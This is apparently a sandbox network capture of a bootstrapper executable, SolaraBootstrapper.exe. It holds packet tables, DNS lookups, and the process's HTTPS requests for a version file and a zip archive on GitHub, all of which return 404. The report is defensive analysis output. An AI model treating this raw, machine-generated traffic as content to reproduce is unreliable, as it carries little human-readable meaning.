Jan 7, 2025 16:09:11.450535059 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.450570107 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.450582027 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.450593948 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.450648069 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.450788021 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.450956106 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.450959921 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.451183081 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.451232910 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.451241970 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.451602936 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.451631069 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.451658010 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.451663971 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.451668978 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.451702118 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.452125072 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.452158928 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.452174902 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.452179909 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.452217102 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.452220917 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.453001976 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.453039885 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.453066111 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.453072071 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.453164101 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.527318954 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.534861088 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.534904957 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.534930944 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.534931898 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.534943104 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.534986019 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.534993887 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.535170078 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.542803049 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.542870045 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.542896032 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.542922020 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.542941093 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.542957067 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.542975903 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.543394089 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.543422937 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.543447971 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.543458939 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.543468952 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.543487072 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.543498993 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.543593884 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.543600082 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544291973 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544318914 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544343948 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544358969 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.544372082 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544394016 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.544404030 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544442892 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.544447899 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544888973 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544913054 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.544961929 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.544977903 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.545015097 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.545016050 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.545026064 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.545074940 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.545078039 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.545084000 CET	443	49706	140.82.121.3	192.168.2.5
Jan 7, 2025 16:09:11.545126915 CET	49706	443	192.168.2.5	140.82.121.3
Jan 7, 2025 16:09:11.545305967 CET	49706	443	192.168.2.5	140.82.121.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 16:09:08.089036942 CET	57243	53	192.168.2.5	1.1.1.1
Jan 7, 2025 16:09:08.095669985 CET	53	57243	1.1.1.1	192.168.2.5
Jan 7, 2025 16:09:09.446777105 CET	57897	53	192.168.2.5	1.1.1.1
Jan 7, 2025 16:09:09.453808069 CET	53	57897	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 16:09:08.089036942 CET	192.168.2.5	1.1.1.1	0x7d86	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:09:09.446777105 CET	192.168.2.5	1.1.1.1	0xba46	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 16:09:08.095669985 CET	1.1.1.1	192.168.2.5	0x7d86	No error (0)	github.com	140.82.121.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:09:09.453808069 CET	1.1.1.1	192.168.2.5	0xba46	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:09:09.453808069 CET	1.1.1.1	192.168.2.5	0xba46	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:09:09.453808069 CET	1.1.1.1	192.168.2.5	0xba46	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:09:09.453808069 CET	1.1.1.1	192.168.2.5	0xba46	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

raw.githubusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	140.82.121.3	443	3948	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:09:08 UTC	105	OUT	GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 Host: github.com Connection: Keep-Alive
2025-01-07 15:09:09 UTC	473	IN	HTTP/1.1 404 Not Found Server: GitHub.com Date: Tue, 07 Jan 2025 15:09:09 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
2025-01-07 15:09:09 UTC	3390	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 66 62 63 34 62 39 39 61 37 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 63 66 66 31 63 39 62 32 37 62 31 61 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 Data Ascii: fbc4b99a77.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-cff1c9b27b1a.css" /><link data-color-theme="dark_colorblind" crossorigi
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 74 73 2f 70 72 69 6d 65 72 2d 34 34 33 30 64 33 63 32 63 31 35 30 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 6c 6f 62 61 6c 2d 31 64 33 34 34 30 65 39 34 36 64 64 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 Data Ascii: ts/primer-4430d3c2c150.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-1d3440e946dd.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.gith
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 6d 65 2d 33 31 38 66 66 37 31 30 34 35 63 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69 73 74 5f 70 6f 70 6f 76 65 72 5f 6a 73 2d 39 64 61 36 35 32 66 35 38 34 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 Data Ascii: me-318ff71045cf.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script><script crossori
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 36 64 61 34 62 33 66 61 33 34 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 75 74 6f 2d 63 6f 6d 70 6c 65 74 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f Data Ascii: e_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 66 39 39 31 63 66 61 62 35 31 30 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 62 35 33 36 32 64 33 64 34 30 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 Data Ascii: ithub-elements-f991cfab5105.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-3b5362d3d402.js"></script><script crossorigin="anonymous" defer="defer" typ
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 65 33 31 38 30 66 65 33 62 63 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f Data Ascii: ymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 66 62 34 33 38 31 36 61 62 38 33 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 Data Ascii: n/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-fb43816ab83c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javas
2025-01-07 15:09:09 UTC	1370	IN	Data Raw: 63 32 38 37 65 34 33 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 4a 47 4d 6a 59 36 4d 54 4d 34 4e 7a 55 36 4d 30 45 31 4d 7a 4e 45 52 54 6f 7a 51 6b 4a 44 4e 7a 52 45 4f 6a 59 33 4e 30 51 30 4d 7a 6b 30 49 69 77 69 64 6d 6c 7a 61 58 52 76 63 6c 39 70 5a 43 49 36 49 6a 59 34 4d 54 63 77 4d 44 59 35 4f 54 6b 78 4e 44 59 32 4e 7a 63 78 4e 44 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57 Data Ascii: c287e43" data-turbo-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IjJGMjY6MTM4NzU6M0E1MzNERTozQkJDNzREOjY3N0Q0Mzk0IiwidmlzaXRvcl9pZCI6IjY4MTcwMDY5OTkxNDY2NzcxNDEiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.199.109.133	443	3948	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:09:09 UTC	135	OUT	GET /quivings/Solara/main/Storage/version.txt HTTP/1.1 User-Agent: Solara Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-07 15:09:10 UTC	803	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: AADD:29B7FE:662F5A:719583:677D4395 Accept-Ranges: bytes Date: Tue, 07 Jan 2025 15:09:10 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740055-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736262550.984424,VS0,VE28 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 8babbe5f5a38ad2b58889605f76de69410d799f9 Expires: Tue, 07 Jan 2025 15:14:10 GMT Source-Age: 0
2025-01-07 15:09:10 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	140.82.121.3	443	3948	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:09:11 UTC	81	OUT	GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 Host: github.com
2025-01-07 15:09:11 UTC	473	IN	HTTP/1.1 404 Not Found Server: GitHub.com Date: Tue, 07 Jan 2025 15:09:09 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
2025-01-07 15:09:11 UTC	3387	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefe
